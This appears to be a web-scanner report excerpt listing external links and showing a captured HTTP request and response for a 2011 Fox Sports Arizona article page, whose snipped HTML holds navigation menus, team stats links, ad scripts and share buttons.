http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule
http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats
http://foxsportsarizona.stats.com/fb/index.asp
http://foxsportsarizona.stats.com/fb/scoreboard.asp
http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats
http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions
http://foxsportsarizona.stats.com/fb/totalstandings.asp
http://foxsportsarizona.stats.com/mlb/index.asp
http://foxsportsarizona.stats.com/mlb/scoreboard.asp
http://foxsportsarizona.stats.com/mlb/standings.asp
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats
http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans
http://foxsportsarizona.stats.com/nba/index.asp
http://foxsportsarizona.stats.com/nba/scoreboard.asp
http://foxsportsarizona.stats.com/nba/standings.asp
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans
http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule
http://foxsportsarizona.stats.com/nhl/index.asp?season=reg
http://foxsportsarizona.stats.com/nhl/scoreboard.asp
http://foxsportsarizona.stats.com/nhl/standings_conference.asp
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster
http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule
http://foxsportsarizona.stats.com/wnba/leaders.asp
http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06
http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06
http://foxsportsarizona.stats.com/wnba/scoreboard.asp
http://foxsportsarizona.stats.com/wnba/standings.asp
http://foxsportsarizona.stats.com/wnba/stats.asp?team=06
http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://latino.redacted/
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911
http://msn.foxsports.com/golf/leaderboard
http://msn.foxsports.com/nascar/story/Aggressive-pace-stumps-veteran-drivers-in-Rolex-24-012911
http://msn.foxsports.com/nascar/story/jimmie-johnson-seeking-first-win-at-rolex-24-at-daytona-012911
http://msn.foxsports.com/nfl/gallery/senior-bowl-gallery-012911
http://msn.foxsports.com/nfl/story/senior-bowl-stock-rise-and-fall-012911
http://msn.foxsports.com/search
http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://platform.twitter.com/widgets.js
http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png
http://platformic-common.s3.amazonaws.com/global_images/icons/email.png
http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png
http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png
http://platformic-common.s3.amazonaws.com/global_images/icons/print.png
http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png
http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg
http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg
http://realestate.redacted/
http://rss.redacted/
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&cg=0&cc=1&ts=noscript
http://specials.redacted/alphabet.aspx
http://thebubble.redacted/
http://tv.redacted/
http://twitter.com/share
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=FOXSP
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.foxsportscarolinas.com/
http://www.foxsportsdetroit.com/
http://www.foxsportsflorida.com/
http://www.foxsportshouston.com/
http://www.foxsportskansascity.com/
http://www.foxsportsmidwest.com/
http://www.foxsportsnorth.com/
http://www.foxsportsohio.com/
http://www.foxsportssouth.com/
http://www.foxsportssouthwest.com/
http://www.foxsportstennessee.com/
http://www.foxsportswest.com/
http://www.foxsportswisconsin.com/
http://www.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.myhomeredacted/
http://www.nesn.com/
http://www.razorgator.com/tickets/sports/
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=3698&gt1=39002 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sun, 30 Jan 2011 17:10:29 GMT
Date: Sun, 30 Jan 2011 17:10:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/4/mozcompat.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.redacted/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.redacted"><img id="msnlogo" src="http://blstc.redacted/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to redacted" alt="go to redacted" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.redacted/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.redacted/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.redacted/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.redacted/"> TV</a></li><li><a href="http://entertainment.redacted/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.redacted/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.redacted/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.redacted/">Real Estate & Rentals</a>
...[SNIP]...
<li><a href="http://articles.redacted/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.redacted/your-look/">Beauty & Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.redacted/your-home/">Decor & Organizing</a>
...[SNIP]...
<li><a href="http://glo.redacted/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet & Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS">Horoscopes</a></li><li><a href="http://lifestyle.redacted/relationships/">Love & Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://my.redacted/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.redacted/en-us/home">Games</a></li><li><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.redacted/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li><li><a href="http://realestate.redacted/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.redacted/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Arizona</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<a href='/pages/main' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7552.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
<a href='http://www.foxsportsflorida.com' target = '_blank' >FS Florida</a>
<a href='http://www.foxsportshouston.com' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
<a href='/pages/dbacks' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7689.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=profiles' target = '_blank' >Team stats</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/mlb/teamreports.asp?tm=29&report=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/mlb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/mlb/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/mlb/index.asp' target = '_blank' >MLB leaders</a>
...[SNIP]...
<a href='/pages/suns' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7688.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=roster' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=enc' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nba/teamstats.asp?teamno=21&btnGo=Go&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/nba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nba/index.asp' target = '_blank' >NBA leaders</a>
...[SNIP]...
<a href='/pages/coyotes' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7687.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=schedule' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=roster' target = '_blank' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/nhl/teamstats.asp?teamno=24&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/nhl/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/nhl/standings_conference.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/nhl/index.asp?season=reg' target = '_blank' >NHL leaders</a>
...[SNIP]...
<a href='/pages/sundevils' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7690.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0058&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0018&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azwildcats' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/8679.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0057&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0017&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...
<a href='/pages/azcardinals' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7692.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?teamno=22&type=schedules' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=rosters' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=stats' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=injuries' target = '_blank' >Injury report</a>
<a href='http://foxsportsarizona.stats.com/fb/teamstats.asp?yr=2010&tm=22&btnGo=Go&type=transactions' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/fb/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/fb/totalstandings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/fb/index.asp' target = '_blank' >NFL stats</a>
...[SNIP]...
<a href='/pages/mercury' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7693.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/wnba/schedules.asp?team=06' target = '_blank' >Schedule</a>
<a href='http://foxsportsarizona.stats.com/wnba/rosters.asp?team=06' target = '_blank' >Roster</a>
<a href='http://foxsportsarizona.stats.com/wnba/stats.asp?team=06' target = '_blank' >Statistics</a>
<a href='http://foxsportsarizona.stats.com/wnba/transinj.asp?team=06&type=trans' target = '_blank' >Transactions</a>
<a href='http://foxsportsarizona.stats.com/wnba/scoreboard.asp' target = '_blank' >Scoreboard</a>
<a href='http://foxsportsarizona.stats.com/wnba/standings.asp' target = '_blank' >Standings</a>
<a href='http://foxsportsarizona.stats.com/wnba/leaders.asp' target = '_blank' >WNBA stats</a>
...[SNIP]...
<a href='/pages/nau' target = '_self' ><IMG SRC=http://platformic-foxariz.s3.amazonaws.com/menu_images/7696.jpg border=0></a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0118&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0420&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=schedule' target = '_blank' >Football schedule</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=roster' target = '_blank' >Football roster</a>
<a href='http://foxsportsarizona.stats.com/cfb/teamstats.asp?yr=2010&team=0041&btnGo=Go&report=stats' target = '_blank' >Football stats</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=schedule' target = '_blank' >Basketball schedule</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=roster' target = '_blank' >Basketball roster</a>
<a href='http://foxsportsarizona.stats.com/cbk/teamstats.asp?yr=&team=0405&btnGo=Go&report=stats' target = '_blank' >Basketball stats</a>
...[SNIP]...

<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" type="text/javascript"></script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=728x90;ord=1296406997?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' border=0> <a href="#cmnta_399825">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825^feedID=3698^gt1=39002^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=399825&feedID=3698&gt1=39002&" target=_blank rel="nofollow">
...[SNIP]...
sharer.php?u=' + encodeURIComponent(document.location) + '&t=' + encodeURIComponent('No limits for Robles as next stage beckons') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsarizona.com/common/dynrss/dynrss_3698_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...

<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" type="text/javascript"></script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.arizona/landing;tile=3;sz=300x250;ord=1296406997?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<li><a href="http://msn.foxsports.com/golf/leaderboard
" target='_blank'>Round 4 at Torrey Pines
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/tennis/story/novak-djokovic-beats-andy-murray-wins-second-australian-open-title-013011
" target='_blank'>Djokovic tops Murray in straight sets
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/story/senior-bowl-stock-rise-and-fall-012911
" target='_blank'>Senior Bowl: Risers and fallers
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb/story/Senior-Bowl-Christian-Ponder-South-victory-012911
" target='_blank'>Ponder leads South to Senior Bowl win
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl/gallery/senior-bowl-gallery-012911
" target='_blank'>Senior Bowl photos
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/jimmie-johnson-seeking-first-win-at-rolex-24-at-daytona-012911
" target='_blank'>Rolex 24 action is wild and woolly
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar/story/Aggressive-pace-stumps-veteran-drivers-in-Rolex-24-012911
" target='_blank'>Aggressive pace stumps veterans
</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk/story/Louisville-takes-down-fifth-ranked-Connecticut-in-double-overtime-012811
" target='_blank'>Louisville holds off UConn in double OT
</a>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(2)</span> <span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Comments <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/comment.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(3)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(2)</span>
...[SNIP]...
<br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">FOX Sports Detroit</a><br>

<a href="http://www.foxsportsflorida.com"

target="_blank">FOX Sports Florida</a><br>

<a href="http://www.foxsportshouston.com"

target="_blank">FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
